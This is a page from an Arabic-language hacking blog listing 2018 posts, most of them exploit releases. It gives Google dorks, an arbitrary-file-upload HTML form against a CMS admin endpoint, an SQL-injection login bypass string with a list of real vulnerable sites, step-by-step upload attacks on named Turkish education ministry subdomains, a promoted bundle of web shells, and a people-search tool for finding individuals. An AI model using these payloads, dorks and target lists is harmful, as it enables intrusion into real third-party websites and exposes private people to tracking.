loading...

mardi 10 avril 2018

MES : WordPress Viral Optins Plugin Exploit and File Upload - ثغرة جديدة 2018

[+] Title : WordPress Viral Optins Plugin Exploit and File Upload

[+] Author : C-BLaCk [+] Tested on: Windows [+] Video Link : Here ###################### # [+] DESCRIPTION : ###################### [+] Dork: inurl:/wp-content/plugins/viral-optins/ [+] Exploit: Code Link: Here [+] If you face any problem you can watch this video Video Link: Here

mercredi 4 avril 2018

برنامج يحتوي على مجموعة سكربتات و شلات مفيدة في اختراق المواقع

السلام عليكم



بمناسبة وصول صفحتنا الخاصة الى 1000 لايك بفضلكم سوف اشرح برنامج من تصميم قمت فيه بتجميع مجموعة من سكربتات و شلات التي سوف تحتاجها في مسيرتك مع اختراق المواقع و سرفرات اترككم مع شرح و لاتنسو اشتراك في قناتنا و شكرا



رابط التحميل




mardi 3 avril 2018

أكبر محرك بحث للعثور على أي شخص والحصول على معلومات عنه بضغطة زر

الويب ملئ بالعديد من المواقع والخدمات المميزة ، لكن للأسف الكثير منا يجهل بعض الخدمات والتي قد تشكل له فرصة كبيرة من أجل حل مجموعة من المشاكل . وفي مدونة المحترف قمنا بمشاركة عشرات المواقع المفيدة التي تقدم خدمات ممتازة وبشكل مجاني .

واليوم اخترت ان اشارك معكم موقع مميز وهو عبارة عن محرك بحث اسمه "Pipl" ، هذا المحرك يعد أكبر محرك بحث عن الأشخاص ، حيث من خلال يمكنك البحث عن أسماء الأشخاص وعناوين البريد الإلكتروني وأرقام التليفونات وغيرها. ويتميز الموقع باحتوائه على  قاعدة بيانات ضخمة للأشخاص ومعلومات عنهم من جميع أنحاء العالم .

الموقع سهل الاستخدام ، يكفي ان تقوم بإدخال إسم الشخص الذي تبحث عنه أو رقم هاتفه الخاص ثم تقوم بتحديد بلده من أجل أن تتم عملية البحث عنه بشكل دقيق جدا.

عند النقر على "بحث " سوف تظهر لك جميع النتائج و هي عبارة عن جميع الحسابات الموجودة على مواقع التواصل الإجتماعي و التي تحتوي على نفس الإسم الذي قمت بوضعه أو الحسابات التي تحتوي على رقم الهاتف الذي قمت بإدخاله في عملية البحث .

MES : KJK CMS - Arbitrary File Upload

# Exploit Title: KJK CMS - Arbitrary File Upload # Google Dork: intext:"webSEO.cz" # Date: 3 April, 2018 # Exploit Author: iKAM # Software Link: https://kjk.com.ng

<form method="POST" action="https://servertarget/admin/server/php/" enctype="multipart/form-data"> <input type="file" name="files[]" /> <button>Upload</button></form> Demo: https://tripplegee.ng

samedi 31 mars 2018

MES : Bypass Login Admin ASPX Website

[-] Exploit Title: Bypass Login Admin ASPX Website [-] Google Dork: Powered By :- Versatile Software Services [-] Date: mar,31, 2018
------------------------------------------------------------------------------------------------------------- [-]Username + Password = ' or ''=' [-] URL Login admin 127.0.0.1/alogin.aspx 127.0.0.1/Admin/Login.aspx [-] DEMO:http://www.tprs.in/alogin.aspx [-] DEMO:http://jpskymahavidyalaya.org/alogin.aspx [-] DEMO:http://www.csadc.co.in/alogin.aspx [-] DEMO:http://srrsm.com/alogin.aspx [-] DEMO:http://abalonepublicschool.com/alogin.aspx

mardi 27 mars 2018

أفضل توزيعة لينكس لبناء جدار ناري قوي مجاناً

لينكس  أو جنو/لينكس (على الأصح)، هو نظام تشغيل أو نواة نظام تشغيل مفتوح المصدر يتم تطويره من قبل الآلاف من المطورين والمبرمجين في جميع انحاء العالم . هذا النظام استطاع بكل جدارة ان يثبت مدى قوته اما جميع الأنظمة الأخرى والدليل على ذلك استعماله في طيف عريض من المنصات من الخوادم العملاقة إلى الحواسيب المنزلية و أجهزة الهاتف الجوال، وتطورت واجهات المستخدم العاملة عليه لتدعم كل لغات العالم تقريبا.

جنو لينكس كما يعلم الجميع هو قابل للتكيف مع احتياجات الأشخاص و حتى الشركات والمنظمات العالمية.أهم مميزات لينكس هي تنوع توزيعاته و كثرتها فكل منها يحتوى على أدوات تساعد على القيام بأمر محدد في مجال محدد ، فهناك ما يهم إختبار الإختراق و هناك التي تهتم بالسيرفورات كما هناك التي تهتم بالبحث الجنائي، وغيرها .

واليوم سنتعرف على توزيعة "pfSense" وهي عبارة عن جدار ناري مجاني مفتوح المصدر واجهة ويب . طبعا هذا الجدار الناري يحتوي على العديد من المميزات التي تتواجد في كبرى شركات الحماية و كل هذه المميزات مجانية بالكامل !

اكبر ما يميز هذا الجدار الناري وجود أدوات كثيرة جدا لتشخيص الأعطال وتستطيع تحميل Pاچكاعيس مجانية لإضافة خدمات اخرى . ومن بين الخدمات التي تقدم لك هذه التوزيعة خدمات مثل DHCP, DNS, VPN, Load balancing.

lundi 26 mars 2018

MES : Turkish Meb.Gov.tr Subdomains Upload File Vulnerability

Turkish Meb.Gov.tr Subdomains Upload File Vulnerability -------------------------------------------------------------

Version One : Step 1 Open the page and sign up random turkish citizenship number Step 2 Rename index.html to index.jpg,index.jpg.html Step 3 Click upload button and select index file Success E.g : http://sisli.meb.gov.tr/ucretliogretmenlik/ http://silivri.meb.gov.tr/ucretliogretmenlik/ Version Two : Step 1 Open the page and click "2017-2018 Eğitim-Öğretim Yılı Ücretli Öğretmenlik Başvuru Formu" Step 2 sign up random turkish citizenship number,name... Step 3 Click upload button and select index file (index.html,index.jpg.html,index.jpg etc.) Success E.g : http://sultangazi.ucretliogretmen.xyz/basvuru/sgbasvuru2017.php http://arnavutkoy.ucretliogretmen.xyz/basvuru/abasvuru2017.php
جميع الحقوق محفوظة © 2013 Moroccan Electronic School
تصميم : يعقوب رضا